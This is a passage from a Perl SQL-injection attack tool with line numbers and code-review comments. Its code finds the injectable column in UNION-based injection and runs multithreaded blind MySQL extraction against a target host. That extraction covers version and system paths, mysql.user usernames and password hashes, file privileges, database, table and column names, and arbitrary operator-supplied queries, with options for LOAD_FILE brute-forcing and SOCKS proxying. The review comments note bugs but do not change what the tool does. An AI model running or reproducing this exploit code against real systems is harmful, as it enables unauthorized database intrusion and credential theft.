  1814.               $data1 = "";
  1815.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1816.               ($print_col,$good_url) = split(/\|\|/,$data1);
  1817.               if ($print_col) {
  1818.                   print "---------------------------\n";
  1819.                   print "Printable column = " . $print_col . "\n";
  1820.                   print "Right url - " . $good_url . "\n";
  1821.                   print FILE1 "------------------\n";
  1822.                   print FILE1 "Printable column:" . $print_col . "\n";
  1823.                   print FILE1 "------------------\n";
  1824.                   print FILE1 $good_url . "\n";
  1825.                   print "----------\n";
  1826.                   print "Saved in " . "z_" . $host5. ".txt\n";
  1827.                   close(FILE1);
  1828.                   goto START;
  1829.               }
  1830.   #############################################################
  1831.   LIMIT1:
  1832.   print "--------------------------------------\n";
  1833.   print "Searching printable column - limit" . $plus_c . "1,1\n";
  1834.   print "--------------------------------------\n";
  1835.   $current_column_limit = "1,1";
  1836.               %aa = ();
  1837.               $print_col = 0;
  1838.               $good_url = "";
  1839.               $aa = gets6000();
  1840.               $data1 = "";
  1841.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1842.               ($print_col,$good_url) = split(/\|\|/,$data1);
  1843.               if ($print_col) {
  1844.                   print "---------------------------\n";
  1845.                   print "Printable column = " . $print_col . "\n";
  1846.                   print "Right url - " . $good_url . "\n";
  1847.                   print FILE1 "------------------\n";
  1848.                   print FILE1 "Printable column:" . $print_col . "\n";
  1849.                   print FILE1 "------------------\n";
  1850.                   print FILE1 $good_url . "\n";
  1851.                   print "----------\n";
  1852.                   print "Saved in " . "z_" . $host5. ".txt\n";
  1853.                   close(FILE1);
  1854.                   goto START;
  1855.               }
  1856.  #############################################################
  1857.  sub gets6000 {
              # Find the "printable" column of a UNION-based injection.
              # Builds one probe per column position 1..$c_number: the probe for
              # position $i lists the ordinals 1..$c_number but replaces slot $i with
              # $sql_pref1 . $i . $sql_pref2 (the marker payload).  A "limit
              # $current_column_limit" clause is appended when that global is set.
              # The probes are then scanned in parallel by gets509 (below) and a
              # hashref { slot => "<column number>||<probe url>" } is returned, merged
              # from every worker.  Everything is package-global state: $host, $union,
              # $current, @columns_print, @columns_print_n, $size, %res, $num, $ii.
  1858.       $union = "";
  1859.       $current = "";
  1860.       $host = $host5;   # target host; presumably read by scan_url() (not visible here) — confirm
  1861.       for($i=1; $i <= $c_number; $i++) {
                 # $union becomes e.g. "1,2,<marker>,4" with the marker in slot $i.
  1862.          for($j=1; $j <= $c_number; $j++) {
  1863.            $temp = $sql_pref1 . $i . $sql_pref2;
  1864.            if($j==1){if($j==$i){$union=$temp}else{$union=$j}}
  1865.            elsif($j==$i){$union=$union.",".$temp}
  1866.            else{$union=$union.",".$j;}
  1867.          }
  1868.          if ($current_column_limit) {
  1869.             $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $plus_c . "limit" . $plus_c . $current_column_limit . $filtr_c;
  1870.          } else {
  1871.             $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $filtr_c;
  1872.          }
                 # NOTE(review): @columns_print / @columns_print_n are globals that are
                 # never reset here.  The caller invokes this sub up to three times
                 # (no limit, then limit 0,1, then limit 1,1), so each call appends
                 # to the previous probe list, $size grows, and the earlier probes are
                 # re-sent on every call.  Clearing both arrays at the top would fix it.
  1873.          push(@columns_print, $current11);
  1874.          push(@columns_print_n, $i);
  1875.       }
  1876.       $size = @columns_print;
  1877.       %res = ();
  1878.       $thr509 = $kol_threads; # number of worker threads (global setting)
  1879.       $num = -1; # shared slot counter: -1 so the first locked increment yields slot 0
  1880.       $ii = 0;
              # 0..$thr509 spawns $kol_threads + 1 workers, not $kol_threads.
              # ($thr509 the scalar and @thr509 the handle array are distinct variables.)
  1881.       for(0..$thr509) {
  1882.           $thr509[$_] = threads->create(\&gets509);
  1883.       }
              # Merge each worker's hashref into %res.  A worker that finds nothing
              # falls off its loop without an explicit return, so join yields a false
              # scalar; with no "use strict" in this file %{...} of that value silently
              # dereferences to an empty hash.  Under strict refs it would die.
  1884.       for(0..$thr509) {
  1885.           %res = (%res, %{$thr509[$_]->join});
  1886.       }
              # Worker body.  Although written inside gets6000, a named sub is
              # package-level in Perl — it is not a closure over anything here.
              # Claims slots from the shared counter $num, sends the probe in
              # $columns_print[$num] via scan_url() and returns on the first response
              # that carries the "ussr...ussr" marker pair (assumed to be produced by
              # $sql_pref1/$sql_pref2 — not visible here).
  1887.       sub gets509 {
  1888.               $| = 1;   # autoflush so the "\r" progress line below is visible
  1889.               %hash = ();
  1890.               while ($num < $size) {
  1891.                     { lock($num);
  1892.                     $num++; }
                          # NOTE(review): $num is read again after the lock is released.
                          # Another worker can increment it in between, so $ii/$current/
                          # $nom may describe a different slot than this thread claimed
                          # (or an out-of-range one).  Copy $num to a local inside the
                          # lock block and use that copy below.
  1893.                     $ii = $num;
  1894.                     $current = $columns_print[$num];
  1895.                     $nom = $columns_print_n[$num];
                          # The while-test precedes the increment, so $num can reach $size;
                          # this guard skips that out-of-range slot.
  1896.                     if ($ii < $size) {
  1897.                        $content = scan_url();
  1898.                        if ($content =~ m/ussr(.*?)ussr/img) {
  1899.                               $hash{$ii} = $nom . "||" . $current;
  1900.                               $ii = $size;   # has no effect on the loop condition (which tests $num)
                                     # NOTE(review): "break" is not a Perl loop keyword
                                     # (only a given/when feature).  Without "use strict"
                                     # it is a bareword evaluated as a string and does
                                     # nothing; the return on the next line is what exits.
  1901.                               break;
  1902.                               return \%hash;
  1903.                        }
  1904.                     }
  1905.                     print $num . "\r";
  1906.                     sleep $pause;
  1907.               }
  1908.       }
  1909.       return \%res;
  1910.  }
  1911.  print "----------\n";
  1912.  print "Can't find printable column...\n";
  1913.  close(FILE1);
  1914.  goto START;
  1915. }
  1916. ## Mysql blind ##
  1917. if ($choice == 10) {
  1918. if ($bl_url =~ m/^https:\/\/?([^\/]+)/i) {
  1919.    $host3 = $1;
  1920.    $https_flag = 1;
  1921.    print "----------------------\n";
  1922.    print "HTTPS mode enabled\n";
  1923.    print "----------------------\n";
  1924. }
  1925. $host = $host3;
  1926. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  1927.     print "-----------------------------------------\n";
  1928.     print "Authorization required, wait please....";
  1929.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  1930.     $ck1 = collect($answ1);
  1931.     $https_auth_check = 1;
  1932.     print " DONE\n";
  1933.     print "-----------------------------------------\n";
  1934. }
  1935.    print $host . "\n";
  1936. if ($use_socks == 1 && $socks_check == 0) {
  1937.   $check_url = $host;
  1938.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  1939.            . "Host: $check_host\r\n"
  1940.            . "Referer: http://" . $check_url . "\r\n"
  1941.            . "Accept: */*\r\n"
  1942.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  1943.            . "Connection: close\r\n\r\n";
  1944.    print "----------------------------------------\n";
  1945.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  1946.    print "Timeout = 5 sec:\n";
  1947.    print "----------------------------------------\n";
  1948.    $socks_check = 0;
  1949.    $check_socks = socks_check();
  1950.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  1951.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  1952.   if ($current_proxy_host) {
  1953.      $socks_check = 1;
  1954.      print "Will use --> $proxy_message\n";
  1955.   } else {
  1956.      $socks_check = 0;
  1957.      $proxy_message = "No";
  1958.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  1959.   }
  1960. }
  1961.    START10:
  1962.    $schema_flag = 0;
  1963.    print "-----------------------------------------\n";
  1964.    print "Choose mode:\n";
  1965.    print "----------\n";
  1966.    print "    [1]  Blind System information\n";
  1967.    print "    [2]  Blind inj get DB-names from information_schema.schemata\n";
  1968.    print "    [3]  Blind inj get tables from DB-name\n";
  1969.    print "    [4]  <<< Blind ANY QUERY >>>\n";
  1970.    print "    [5]  Blind inj get column_name from tables from DB-name\n";
  1971.    print "    [6]  Blind inj get LOAD_FILE (file_priv = Y)\n";
  1972.    print "    [7]  Blind BRUTE LOAD_FILE log/conf files (file_priv = Y)\n";
  1973.    print "    [8]  Blind Get tables from information_schema (current DB)\n";
  1974.    print "    [9]  Blind Get column_name from table (current DB)\n";
  1975.    print "    [10] Blind Get data from columns\n";
  1976.    print "    [11] Blind Brute MySql4 for tables & columns\n";
  1977.    print "    [12] Main menu\n";
  1978.    print "----------\n";
  1979.    $choice = <STDIN>;
  1980.    chomp $choice;
  1981.    print "Your choice: $choice\n";
  1982.    if ($choice==1) {
  1983.    open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  1984.    print FILE1 "----------------------------------\n";
  1985.    print FILE1 "Blind MYsql system information:\n";
  1986.    print FILE1 "----------------------------------\n";
  1987.    # ?????? ?????? #
  1988.    $url1 = "version()";
  1989.    # ?????? ??? ???? #
  1990.    $url2 = "database()";
  1991.    # ?????? ????? #
  1992.    $url3 = "user()";
  1993.    # ?????? @@basedir #
  1994.    $url4 = "@@" . "basedir";
  1995.    # ?????? @@datadir #
  1996.    $url5 = "@@" . "datadir";
  1997.    # ?????? @@tmpdir #
  1998.    $url6 = "@@" . "tmpdir";
  1999.    # ?????? @@version_compile_os #
  2000.    $url7 = "@@" . "version_compile_os";
  2001.    # ?????? mysql.user #
  2002.    $url8 = "user" . $bl_plus . "from" . $bl_plus . "mysql.user";
  2003.    # ?????? mysql.password #
  2004.    $url9 = "password" . $bl_plus . "from" . $bl_plus . "mysql.user";
  2005.    # ?????? file_priv #
  2006.    $url10 = "file_priv" . $bl_plus ."from" . $bl_plus . "mysql.user" . $bl_plus . "where" . $bl_plus . "user=user";
  2007.    ####################
  2008.    $thr = $kol_threads; # ???-?? ???????
  2009.    $num = -1; # ?? ????????
  2010.    $bl_lenght = "";
  2011.    $ii = 0;
  2012.    $mflag = 0;
  2013.    print "-----------------------------------\n";
  2014.    print "Request method - $method\n";
  2015.    print "Threads - $kol_threads\n";
  2016.    print "Proxy - $proxy_message\n";
  2017.    print "----------------------\n";
  2018.    $time = localtime;
  2019.    print $time . "\n";
  2020.    print "-----------------------------------\n";
  2021.    @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url0);
  2022.    $size = @array; #???????? ?????? ???????
  2023.    for(0..$thr) {
  2024.          $trl[$_] = threads->create(\&gets101);
  2025.    }
  2026.    for(0..$thr) {
  2027.          $trl[$_]->join;
  2028.    }
  2029.    sub gets101 {
              # Worker thread for "Blind System information" (mode 1).
              # Claims slots of @array (the caller fills it with version(),
              # database(), user(), @@basedir, @@datadir, @@tmpdir,
              # @@version_compile_os and the mysql.user queries), determines the
              # answer length with len_check()/len_check1() and then extracts it one
              # character at a time.  Results go to STDOUT and to the FILE1 handle
              # the caller opened in append mode.  All state is package-global:
              # $num (shared counter), $bl_current, $bl_lenght, $ii, $data1, $mflag.
              # NOTE(review): the caller's @array ends with $url0, which is never
              # assigned, where $url10 (the file_priv query) appears to be intended;
              # that slot is therefore an empty query.
  2030.         $| = 1;   # autoflush so the "\r" progress output shows
  2031.         while ($num < $size) {
  2032.             { lock($num);
  2033.             $num++; }
                   # NOTE(review): $num is re-read outside the lock, so a concurrent
                   # worker can change it first and this thread then processes a slot it
                   # did not claim.  Because the while-test precedes the increment, $num
                   # can also equal $size here, giving an undef $bl_current that still goes
                   # through len_check().  Capture $num into a local inside the lock block.
  2034.             $bl_current = $array[$num];
                   # $bl_mode selects between two length-probe variants defined elsewhere.
  2035.             if ($bl_mode==0) {
  2036.                    $bl_lenght = len_check();
  2037.             } else {
  2038.                    $bl_lenght = len_check1();
  2039.             }
                   # Only answers of 1..999 characters are extracted.
  2040.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2041.                  print $bl_current . " [length]:" .  $bl_lenght . "\n";
                        # The caller sets $mflag = 0 right before spawning, so this
                        # gets1000() branch is not taken in this mode.
  2042.                 if ($mflag == 1) {
  2043.                      ############################################################
  2044.                      %aa = ();
  2045.                      $aa = gets1000();
  2046.                      $data1 = "";
                             # The stray comma before "for" is a trailing comma in a
                             # one-element list; the statement modifier still applies.
  2047.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2048.                      #############################################################
  2049.                  } else {
  2050.                    $data1 = "";
                          # Per-character extraction.  $ii is a package global;
                          # get_res_normal()/get_res_normal1() take no arguments, so they
                          # presumably read $ii and $bl_current — confirm in their definition.
  2051.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2052.                     if ($bl_mode==0) {
  2053.                          $data1 .= chr(get_res_normal());
  2054.                     } else {
  2055.                          $data1 .= chr(get_res_normal1());
  2056.                     }
  2057.                       print $data1 . "\r";
  2058.                    }
  2059.                  }
  2060.                  print "\n------------------------------------------------------\n";
  2061.                  print "---> " . $bl_current . ": " . $data1 . "\n";
  2062.                  print "------------------------------------------------------\n";
  2063.                  print FILE1 $bl_current . ": " . $data1 . "\n";
  2064.             }
  2065.             $oo++;   # counter is incremented but never read in this block
  2066.             sleep $pause;
  2067.         }
  2068.    }
  2069.    $time = localtime;
  2070.    print "\n" . $time . "\n";
  2071.      print "----------\n";
  2072.      print "Saved in " . "z_" . $host3 . ".txt\n";
  2073.      close(FILE1);
  2074.      goto START10;
  2075. }
  2076. # Blind db names
  2077. if ($choice==2) {
  2078.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2079.      print "-----------------------------------\n";
  2080.      ## ???????? ##
  2081.      $bl_lenght = "";
  2082.      $ii = 0;
  2083.      $bl_current = "(select" . $bl_plus .  "count(schema_name)" . $bl_plus . "from" . $bl_plus . "information_schema.schemata)";
  2084.      if ($bl_mode==0) {
  2085.             $bl_lenght = len_check();
  2086.      } else {
  2087.             $bl_lenght = len_check1();
  2088.      }
  2089.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2090.           print "Count DB in information_schema.schemata  [length]:" .  $bl_lenght . "\n";
  2091.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2092.                if ($bl_mode==0) {
  2093.                    $bl_table_number_NIS .= get_res_count();
  2094.                } else {
  2095.                    $bl_table_number_NIS .= get_res_count1();
  2096.                }
  2097.                 print $bl_table_number_NIS . "\r";
  2098.                 sleep $pause;
  2099.           }
  2100.           print "\n------------------------------------------------------\n";
  2101.           print "Count DB in information_schema.schemata [value]:" . $bl_table_number_NIS . "\n";
  2102.           print "--------------------------------------------------------\n";
  2103.      } else {
  2104.           print "\n------------------------------------------------------\n";
  2105.           print "Cant't get data...\n";
  2106.           print "------------------------------------------------------\n";
  2107.      }
  2108.      $time = localtime;
  2109.      print $time . "\n";
  2110.      print "-----------------------------------\n";
  2111.      ## start from2 ##
  2112.      print FILE1  "-----------------------------------------\n";
  2113.      print FILE1  "DB in information_schema.schemata - $bl_table_number_NIS\n";
  2114.      print FILE1  "-----------------------------------------\n";
  2115.      print "Normal MODE - records > 10\n";
  2116.      print "Fast MODE - records <= 10\n";
  2117.      print "-----------------------------------------\n";
  2118.      $thr = $kol_threads; # ???-?? ???????
  2119.      $num = -1; # ?? ????????
  2120.      ## end from2
  2121.      print "Request method - $method\n";
  2122.      print "Threads - $kol_threads\n";
  2123.      print "Proxy - $proxy_message\n";
  2124.      print "----------------------\n";
  2125.      TABLES:
  2126.      $time = localtime;
  2127.      print $time . "\n";
  2128.      print "-----------------------------------\n";
  2129.      # ?????? DB #
  2130.      $bl_lenght = "";
  2131.      $ii = 0;
  2132.      $s = 0;
  2133.      $mflag = 0;
  2134.      print "-----------------------------------\n";
  2135.      for(0..$thr) {
  2136.          $trl[$_] = threads->create(\&gets102111);
  2137.      }
  2138.      for(0..$thr) {
  2139.          $trl[$_]->join;
  2140.      }
  2141.      sub gets102111 {
              # Worker thread for "Blind inj get DB-names" (mode 2).
              # Claims row offsets 0..$bl_table_number_NIS from the shared counter
              # $num, builds a "select schema_name from information_schema.schemata
              # limit N,1" subquery, measures its length and extracts it character by
              # character.  $bl_table_number_NIS is the digit string the caller
              # accumulated from the count probe; it is compared numerically here.
              # Output goes to STDOUT and the FILE1 handle opened by the caller.
  2142.         $| = 1;   # autoflush so the "\r" progress output shows
  2143.         while ($num < $bl_table_number_NIS) {
  2144.             { lock($num);
  2145.             $num++; }
                   # NOTE(review): $num is read twice after the lock is released — once
                   # for the $sss label and once inside the subquery string.  Under
                   # contention another worker can increment it in between, so the
                   # "DB limit $sss,1" label may not match the offset actually queried.
                   # Take one copy inside the lock block and use it for both.
  2146.             $sss = $num;
                   # Because the while-test precedes the increment, the final offset can
                   # equal the row count; that query yields no row and is skipped by the
                   # length gate below.
  2147.             $bl_current = "(select" . $bl_plus .  "schema_name" . $bl_plus . "from" . $bl_plus . "information_schema.schemata" . $bl_plus . "limit" . $bl_plus . $num . ",1)";
                   # $bl_mode selects between two length-probe variants defined elsewhere.
  2148.             if ($bl_mode==0) {
  2149.                    $bl_lenght = len_check();
  2150.             } else {
  2151.                    $bl_lenght = len_check1();
  2152.             }
  2153.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2154.                  print "\nDB limit $sss,1 [length]:" .  $bl_lenght . "\n";
                        # The caller sets $mflag = 0 before spawning, so the gets1000()
                        # branch is not taken here; the "Fast MODE" banner it prints
                        # appears to refer to this unused path — confirm.
  2155.                  if ($mflag == 1) {
  2156.                      ############################################################
  2157.                      %aa = ();
  2158.                      $aa = gets1000();
  2159.                      $data1 = "";
                             # Trailing comma before "for" is harmless (one-element list).
  2160.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2161.                      #############################################################
  2162.                  } else {
  2163.                    $data1 = "";
                          # Per-character extraction; get_res_normal*() take no arguments
                          # and presumably read the globals $ii and $bl_current — confirm.
  2164.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2165.                     if ($bl_mode==0) {
  2166.                          $data1 .= chr(get_res_normal());
  2167.                     } else {
  2168.                          $data1 .= chr(get_res_normal1());
  2169.                     }
  2170.                       print $data1 . "\r";
  2171.                    }
  2172.                  }
  2173.                  print "\n-----------------------------------\n";
  2174.                  print "  ---> DB limit $sss,1: " . $data1 . "\n";
  2175.                  print "-----------------------------------\n";
  2176.                  print FILE1 "  ---> DB limit $sss,1: " . $data1 . "\n";
                        # NOTE(review): clears $data, but the buffer used above is $data1;
                        # this assignment has no visible effect.
  2177.                  $data = "";
  2178.             }
  2179.             sleep $pause;
  2180.         }
  2181.     }
  2182.     print "----------\n";
  2183.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2184.     close(FILE1);
  2185.     goto START10;
  2186. } # end DB names
  2187. # Blind tables from DB names
  2188. if ($choice==3) {
  2189.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2190.      $bl_table_number_NIS = "";
  2191.      print "-----------------------------------------\n";
  2192.      print "Enter the DB-name: ";
  2193.      $choice = <STDIN>;
  2194.      chomp $choice;
  2195.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  2196.      print "DB-name: $choice\n";
  2197.      print "----------\n";
  2198.      $choice1 = ascii_to_hex $choice;
  2199.      ## ???????? ##
  2200.      $bl_lenght = "";
  2201.      $ii = 0;
  2202.      $bl_current = "(select" . $bl_plus .  "count(table_name)" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema=" . $plus . $choice1 . ")";
  2203.             if ($bl_mode==0) {
  2204.                    $bl_lenght = len_check();
  2205.             } else {
  2206.                    $bl_lenght = len_check1();
  2207.             }
  2208.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2209.           print "Tables in DB [$choice]: $tab_num1 [length]:" .  $bl_lenght . "\n";
  2210.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2211.                if ($bl_mode==0) {
  2212.                    $bl_table_number_NIS .= get_res_count();
  2213.                } else {
  2214.                    $bl_table_number_NIS .= get_res_count1();
  2215.                }
  2216.                 print $bl_table_number_NIS . "\r";
  2217.                 sleep $pause;
  2218.           }
  2219.           print "\n------------------------------------------------------\n";
  2220.           print "Tables in DB [$choice]: $tab_num1 [value]:" . $bl_table_number_NIS . "\n";
  2221.           print "--------------------------------------------------------\n";
  2222.      } else {
  2223.           print "\n------------------------------------------------------\n";
  2224.           print "Cant't get data...\n";
  2225.           print "------------------------------------------------------\n";
  2226.      }
  2227.      $time = localtime;
  2228.      print $time . "\n";
  2229.      print "-----------------------------------\n";
  2230.      ## start from2 ##
  2231.      print FILE1  "-----------------------------------------\n";
  2232.      print FILE1  "Tables in DB [$choice]:- $bl_table_number_NIS\n";
  2233.      print FILE1  "-----------------------------------------\n";
  2234.      print "Normal MODE - records > 10\n";
  2235.      print "Fast MODE - records <= 10\n";
  2236.      print "-----------------------------------------\n";
  2237.      $thr = $kol_threads; # ???-?? ???????
  2238.      $num = -1; # ?? ????????
  2239.      ## end from2
  2240.      print "Request method - $method\n";
  2241.      print "Threads - $kol_threads\n";
  2242.      print "Proxy - $proxy_message\n";
  2243.      print "----------------------\n";
  2244.      TABLES:
  2245.      $time = localtime;
  2246.      print $time . "\n";
  2247.      print "-----------------------------------\n";
  2248.      # ?????? DB #
  2249.      $bl_lenght = "";
  2250.      $ii = 0;
  2251.      $s = 0;
  2252.      $mflag = 0;
  2253.      print "-----------------------------------\n";
  2254.      for(0..$thr) {
  2255.          $trl[$_] = threads->create(\&gets109999);
  2256.      }
  2257.      for(0..$thr) {
  2258.          $trl[$_]->join;
  2259.      }
  2260.      sub gets109999 {
              # Worker thread for "Blind inj get tables from DB-name" (mode 3).
              # Claims row offsets from the shared counter $num and extracts
              # "select table_name from information_schema.tables where
              # table_schema=<$choice1> limit N,1" one character at a time.
              # $choice1 is the hex-encoded DB name prepared by the caller.
              # NOTE(review): the caller wraps a name containing "-" in backticks
              # *before* hex-encoding it, so for such names the literal compared
              # against table_schema contains the backticks and will not match.
              # NOTE(review): "table_schema=" is followed by $bl_plus here, whereas
              # the caller's count query uses $plus in the same position — confirm
              # both globals decode to the same separator.
  2261.         $| = 1;   # autoflush so the "\r" progress output shows
  2262.         while ($num < $bl_table_number_NIS) {
  2263.             { lock($num);
  2264.             $num++; }
                   # NOTE(review): $num is re-read twice outside the lock (label and
                   # query).  Another worker may have advanced it, so the printed
                   # "Table limit $sss,1" can disagree with the offset actually sent.
                   # Copy $num to a local inside the lock block instead.
  2265.             $sss = $num;
  2266.             $bl_current = "(select" . $bl_plus .  "table_name" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema=" . $bl_plus . $choice1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
                   # $bl_mode selects between two length-probe variants defined elsewhere.
  2267.             if ($bl_mode==0) {
  2268.                    $bl_lenght = len_check();
  2269.             } else {
  2270.                    $bl_lenght = len_check1();
  2271.             }
                   # Only answers of 1..999 characters are extracted; the offset equal
                   # to the row count (reachable because the while-test precedes the
                   # increment) yields no row and is dropped here.
  2272.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2273.                  print "\nTable limit $sss,1 [length]:" .  $bl_lenght . "\n";
                        # $mflag is set to 0 by the caller before spawning, so the
                        # gets1000() branch is not taken in this mode.
  2274.                  if ($mflag == 1) {
  2275.                      ############################################################
  2276.                      %aa = ();
  2277.                      $aa = gets1000();
  2278.                      $data1 = "";
                             # Trailing comma before "for" is harmless (one-element list).
  2279.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2280.                      #############################################################
  2281.                  } else {
  2282.                    $data1 = "";
                          # Per-character extraction via globals $ii / $bl_current
                          # (presumably read by get_res_normal*() — confirm).
  2283.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2284.                     if ($bl_mode==0) {
  2285.                          $data1 .= chr(get_res_normal());
  2286.                     } else {
  2287.                          $data1 .= chr(get_res_normal1());
  2288.                     }
  2289.                       print $data1 . "\r";
  2290.                    }
  2291.                  }
  2292.                  print "\n-----------------------------------\n";
  2293.                  print "  ---> Table limit $sss,1: " . $data1 . "\n";
  2294.                  print "-----------------------------------\n";
  2295.                  print FILE1 "  ---> Table limit $sss,1: " . $data1 . "\n";
                        # NOTE(review): resets $data, not the $data1 buffer used above;
                        # no visible effect.
  2296.                  $data = "";
  2297.             }
  2298.             sleep $pause;
  2299.         }
  2300.     }
  2301.     print "----------\n";
  2302.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2303.     close(FILE1);
  2304.     goto START10;
  2305. } # end tables from DB names
  2306. #######################################################################################################################################################################################
  2307. # Blind some query
  2308. if ($choice==4) {
  2309.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2310.      $bl_table_number_NIS = "";
  2311.      $choice100 =  "";
  2312.      $choice200 =  "";
  2313.      $choice300 = "";
  2314.   if(!$bl_your_query) {
  2315.      print "\$bl_your_query is empty in code\n";
  2316.      print "Enter your query, example - concat_ws(0x3a,table_schema,table_name)\n\n";
  2317.      $choice100 = <STDIN>;
  2318.      chomp  $choice100;
  2319.      print "\n\nEnter condition, without LIMIT [auto count]!!! Example: +from+information_schema.tables+where+table_name+like+0x7573657273 (if NOT- press ENTER):\n\n";
  2320.      $choice200 = <STDIN>;
  2321.      chomp  $choice200;
  2322.   } else {
  2323.      $choice100 =  $bl_your_query;
  2324.      $choice200 =  $bl_from;
  2325.   }
  2326.      $choice300 = $choice100 . $choice200;
  2327.      print "---------------------------------------------------------------------------------------------------------------------------------------\n";
  2328.      print "your query: (select(". $choice100 . ")" . $choice200 . ")\n";
  2329.      print "---------------------------------------------------------------------------------------------------------------------------------------\n";
  2330.      $bl_lenght = "";
  2331.      $ii = 0;
  2332.      $bl_current = "(select(count(" . $choice100 . "))" . $choice200 . ")";
  2333.             if ($bl_mode==0) {
  2334.                    $bl_lenght = len_check();
  2335.             } else {
  2336.                    $bl_lenght = len_check1();
  2337.             }
  2338.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2339.           print "Count records for your answer[length]:" .  $bl_lenght . "\n";
  2340.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2341.                if ($bl_mode==0) {
  2342.                    $bl_table_number_NIS .= get_res_count();
  2343.                } else {
  2344.                    $bl_table_number_NIS .= get_res_count1();
  2345.                }
  2346.                 print $bl_table_number_NIS . "\r";
  2347.                 sleep $pause;
  2348.           }
  2349.           print "\n------------------------------------------------------\n";
  2350.           print "Count records for your answer[value]:" . $bl_table_number_NIS . "\n";
  2351.           print "--------------------------------------------------------\n";
  2352.      } else {
  2353.           print "\n------------------------------------------------------\n";
  2354.           print "Cant't get data...\n";
  2355.           print "------------------------------------------------------\n";
  2356.      }
  2357.      ## ???????? ##
  2358.      $time = localtime;
  2359.      print $time . "\n";
  2360.      print "-----------------------------------\n";
  2361.      $thr = $kol_threads; # ???-?? ???????
  2362.      if($bl_table_number_NIS == 1) {
  2363.         $num = 0; # ?? ????????
  2364.      } else {$num = -1}
  2365.      print "Request method - $method\n";
  2366.      print "Threads - $kol_threads\n";
  2367.      print "Proxy - $proxy_message\n";
  2368.      print "----------------------\n";
  2369.      $bl_lenght = "";
  2370.      $ii = 0;
  2371.      $s = 0;
  2372.      $mflag = 0;
  2373.      print "-----------------------------------\n";
  2374.      for(0..$thr) {
  2375.          $trl[$_] = threads->create(\&gets102222);
  2376.      }
  2377.      for(0..$thr) {
  2378.          $trl[$_]->join;
  2379.      }
  2380.      sub gets102222 {
              # Worker thread for "Blind ANY QUERY" (mode 4).
              # $choice100 (select expression) and $choice200 (FROM/WHERE fragment)
              # are taken verbatim from the caller — either typed by the operator or
              # from $bl_your_query/$bl_from — and spliced into the subquery.
              # When the caller's count probe found more than one row, a
              # "limit N,1" clause is added per claimed offset; for a single row the
              # caller starts $num at 0 so this loop body runs exactly once and the
              # subquery is sent without a limit.
  2381.         $| = 1;   # autoflush so the "\r" progress output shows
  2382.         while ($num < $bl_table_number_NIS) {
  2383.             { lock($num);
  2384.             $num++; }
                   # NOTE(review): $num is re-read outside the lock for both the $sss
                   # label and the limit offset; a concurrent worker can change it in
                   # between, so the label and the query may disagree.  Copy $num to a
                   # local inside the lock block and use that.
  2385.             $sss = $num;
  2386.             if ($bl_table_number_NIS>1){
  2387.                $bl_current = "(select(" . $choice100 . ")" . $choice200 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  2388.             } else {
  2389.                $bl_current = "(select(" . $choice100 . ")" . $choice200 . ")";
  2390.             }
                   # $bl_mode selects between two length-probe variants defined elsewhere.
  2391.             if ($bl_mode==0) {
  2392.                    $bl_lenght = len_check();
  2393.             } else {
  2394.                    $bl_lenght = len_check1();
  2395.             }
                   # Only answers of 1..999 characters are extracted.
  2396.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2397.                  print "\nAnswer[length]:" .  $bl_lenght . "\n";
                        # $mflag is 0 here (set by the caller before spawning), so the
                        # gets1000() branch is not taken in this mode.
  2398.                  if ($mflag == 1) {
  2399.                      ############################################################
  2400.                      %aa = ();
  2401.                      $aa = gets1000();
  2402.                      $data1 = "";
                             # Trailing comma before "for" is harmless (one-element list).
  2403.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2404.                      #############################################################
  2405.                  } else {
  2406.                    $data1 = "";
                          # Per-character extraction via globals $ii / $bl_current
                          # (presumably read by get_res_normal*() — confirm).
  2407.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
